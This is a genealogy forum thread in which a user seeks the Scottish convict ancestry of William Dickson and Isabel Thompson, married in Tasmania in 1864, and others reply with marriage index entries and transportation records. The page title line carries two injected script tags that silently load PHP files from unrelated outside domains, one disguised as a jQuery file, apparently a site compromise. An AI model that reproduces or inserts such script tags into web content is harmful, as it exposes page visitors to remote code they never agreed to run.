Looking for family of William Dickson and Isabel Thompson of Evandale married in 1864 <script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for family of William Dickson and Isabel Thompson of Evandale married in 1864

Query by Pattied

Have had quite a bit of information from Evandale History Society regarding children. 5 died all boys but looks like a daughter born in 1862, John my husband's grandfather (we think,who came to NZ) and another son born in 1868 survived. The parents William and Isabel were transported from Scotland as convicts and I would like to go further back to find Williams parents but every time come to a dead end.
I think William was tried at the Edinburgh Court of Justiciary around 1835. Any help would be gratefully received.
Pattie Dickson

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by Pattied Profile | Research | Contact | Subscribe | Block this user
on 2012-07-29 21:59:15

Pattied has been a Family Tree Circles member since Jul 2012.

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by asheppard on 2012-07-30 20:14:22

Is this his marriage to Isabella, if so a copy should give you both their ages and fathers names.

Australia Marriage Index, 1788-1950 about William Dickson
Name: William Dickson
Spouse Name: Isabella Thompson
Marriage Date: 24 Aug 1864
Marriage Place: Tasmania
Registration Place: Morven, Tasmania
Registration Year: 1864
Registration Number: 578

Do you have a death certificate for him it may also hold some clues as to who his parents were.

Scotlands People site may help once you have a rough birth date and his father name it is a pay per view site.

There are at least two William Dickson tried in Edinburgh and transported to Tasmania around the same time.

1) William Dickson
Tried 16 Feb 1835 - Edinburgh, Midlothian, Scotland
Departure: 18 Jun 1835
Residence: Van Dieman's Land
Sentence seven years
Ship 'Aurora'

2) William Dickson or Nisbet
Tried 13 Feb 1837 - Edinburgh, Midlothian, Scotland
Departure: 27 May 1837
Residence: Van Dieman's Land
Sentence life
Ship 'Recovery'

by Pattied on 2012-08-01 23:07:05

Thank you for your help, no I don't have any certificates just advice from researchers but I wil try Scotlands people site.
Thanks once again.
Pattie Dickson

by kered on 2012-09-11 15:25:41

I a Dickson and trying to rsearch my Dickson in the south west of Scotland Kirkcudbrightshire and Dumfriesshire have not got far yet. will keep you informed on any connections. Derek Dickson

by Pattied on 2012-09-11 22:34:58

Hi "Kered" Thank you for replying, I have been trying to track William down for a number of years, I know I have the right William for us and that is (1) as his son John eventually married my husband's grandmother Eunice maiden name (Bickerstaff)but we are not sure whether my husband's father Eric is his natural son to complicate matters. Anyway would like to go back to forbears in Scotland.
Will try and get marriage certificate.
Do keep in touch and thank you once again.

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